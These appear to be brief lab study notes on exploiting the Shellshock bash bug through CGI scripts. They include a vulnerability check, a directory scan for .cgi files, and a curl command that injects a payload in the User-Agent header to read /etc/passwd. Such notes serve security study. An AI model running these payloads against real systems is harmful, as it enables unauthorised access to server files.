CGI Applications

CGI scripts and programs are kept on /CGI-bin

Shellshock Exploit

(CVE-2014-6271)

Affects GNU bash <= 4.3

Checking (if we are already have shell access)

env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

Finding .cgi files

$ gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

Exploitation

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi